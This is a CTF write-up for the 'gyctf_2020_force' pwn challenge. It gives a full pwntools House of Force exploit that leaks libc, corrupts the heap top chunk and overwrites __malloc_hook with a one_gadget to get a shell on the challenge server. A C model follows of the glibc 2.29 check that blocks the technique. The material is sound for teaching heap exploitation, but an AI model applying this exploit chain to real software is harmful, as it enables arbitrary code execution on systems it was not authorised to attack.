
gyctf_2020_force | House of force

Posted: 2020-12-14 21:59:21

House of Force is one of the easier heap exploitation techniques to understand. This challenge is essentially a bare HOF, but because of all sorts of mistakes it took me two full evenings of debugging before it finally worked. I'm exhausted and have somewhat lost confidence in continuing to learn pwn, but I'll write it down anyway.

EXP

The libc is my local copy with a symbol table.

from pwn import *

# Local libc/ld with symbols (glibc 2.23, the version this challenge runs on)
libc_path = '/home/harvey/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/libc-2.23.so'
ld_path = '/home/harvey/glibc-all-in-one/libs/2.23-0ubuntu11.2_amd64/ld-2.23.so'
elf_path = './gyctf_2020_force'
#r = process([ld_path, elf_path], env={"LD_PRELOAD": libc_path})
r = remote('node3.buuoj.cn', 29681)
context.log_level = 'debug'
elf = ELF(elf_path)
libc = ELF(libc_path)
# one_gadget offsets for this libc build
gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]

def add(size, content):
    # menu option 1: malloc(size); the program prints the chunk address
    r.sendlineafter(b'2:puts', b'1')
    r.sendlineafter(b'size', str(size).encode())
    r.recvuntil(b'bin addr ')
    addr = int(r.recvuntil(b'\n')[:-1], 16)
    r.sendlineafter(b'content', content)
    return addr

def show(idx):
    # menu option 2: puts
    r.sendlineafter(b'2:puts', b'2')

def debug():
    gdb.attach(r)
    pause()

# A 1,000,000-byte request is served by mmap, and on this libc build the
# mapping sits at a fixed offset below libc, so its address leaks libc_base
addr = add(1000000, b'aaaa')
success('malloc addr -> ' + hex(addr))
libc_base = addr - 0x6fa010
realloc = libc_base + libc.symbols['__libc_realloc']
success('realloc -> ' + hex(realloc))
success('libc_base -> ' + hex(libc_base))
# Overflow the 0x18 chunk to overwrite the top chunk size field with -1
pay = b'a'*0x10 + p64(0) + p64(0xffffffffffffffff)
top_chunk = add(0x18, pay) + 0x10
success('top chunk -> ' + hex(top_chunk))
# Request size that moves the top chunk to just before __malloc_hook
target = libc_base + libc.symbols['__malloc_hook'] - top_chunk - 0x33
# Next chunk lands on the hooks: __realloc_hook <- one_gadget,
# __malloc_hook <- realloc+0x10 (realloc's prologue fixes the stack layout for the gadget)
pay = p64(0) + p64(libc_base + gadget[1]) + p64(realloc + 0x10)
add(target, b'a'*0x8)
add(0x10, pay)
# Any further malloc now goes through the overwritten hooks
r.sendlineafter(b'2:puts\n', b'1')
r.sendlineafter(b'size\n', str(0x40).encode())
r.interactive()
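The script above works because glibc 2.23 trusts whatever size is stored in the top chunk. The following C program is an added example, not code from the write-up, that models the top-chunk sanity check glibc added in 2.29 (the "malloc(): corrupted top size" abort), which is what stops a bare House of Force on newer libcs. The arena layout (`toy_arena`, `serve_from_top`, `request2size`) is a simplified stand-in for glibc's internals; only the `size > system_mem` comparison mirrors the real check.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Toy model of glibc's "use_top" path. Layout is simplified; only the
 * size check at the top of serve_from_top() mirrors glibc >= 2.29. */

#define SIZE_BITS      0x7UL   /* PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA */
#define MIN_CHUNK_SIZE 0x20UL

typedef struct {
    uintptr_t top;        /* address of the current top chunk */
    size_t    top_size;   /* its size field, the value an overflow can overwrite */
    size_t    system_mem; /* total memory this arena ever obtained from the kernel */
} toy_arena;

/* Round a request up to a chunk size, like glibc's request2size (simplified). */
static size_t request2size(size_t req) {
    size_t nb = (req + 8 + 15) & ~15UL;
    return nb < MIN_CHUNK_SIZE ? MIN_CHUNK_SIZE : nb;
}

/* Carve a chunk from top. Returns the user pointer, or 0 when the allocator
 * would abort (*aborted set) or would have to grow the heap (toy just refuses). */
uintptr_t serve_from_top(toy_arena *av, size_t req, bool *aborted) {
    size_t nb = request2size(req);
    size_t size = av->top_size & ~SIZE_BITS;
    *aborted = false;

    /* glibc >= 2.29: a top size larger than everything the arena received
     * from the kernel cannot be genuine, so malloc_printerr() is called. */
    if (size > av->system_mem) {
        *aborted = true;
        return 0;
    }
    /* glibc 2.23 only had this check; with size == -1 it always passes. */
    if (size < nb + MIN_CHUNK_SIZE)
        return 0;

    uintptr_t chunk = av->top;
    av->top += nb;
    av->top_size = (size - nb) | (av->top_size & SIZE_BITS);
    return chunk + 0x10; /* user pointer is 2*SIZE_SZ past the chunk header */
}

int main(void) {
    bool aborted;
    /* Constructed arena values: a fresh 0x21000-byte heap. */
    toy_arena sane = { .top = 0x602000, .top_size = 0x21000 | 1, .system_mem = 0x21000 };
    uintptr_t p = serve_from_top(&sane, 0x18, &aborted);
    printf("sane top:      user ptr %#lx, aborted=%d\n", (unsigned long)p, aborted);

    /* Top size overwritten with 0xffffffffffffffff, as in the write-up above. */
    toy_arena corrupted = { .top = 0x602020, .top_size = 0xffffffffffffffffUL, .system_mem = 0x21000 };
    p = serve_from_top(&corrupted, 0x18, &aborted);
    printf("corrupted top: user ptr %#lx, aborted=%d\n", (unsigned long)p, aborted);
    return 0;
}
```

With the sane arena the request is served and top shrinks by 0x20; with the overwritten size the 2.29 check fires before any arithmetic on the top pointer happens, which is the reason this technique is tied to the libc version the target ships.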


Original: https://www.cnblogs.com/zhwer/p/14135734.html
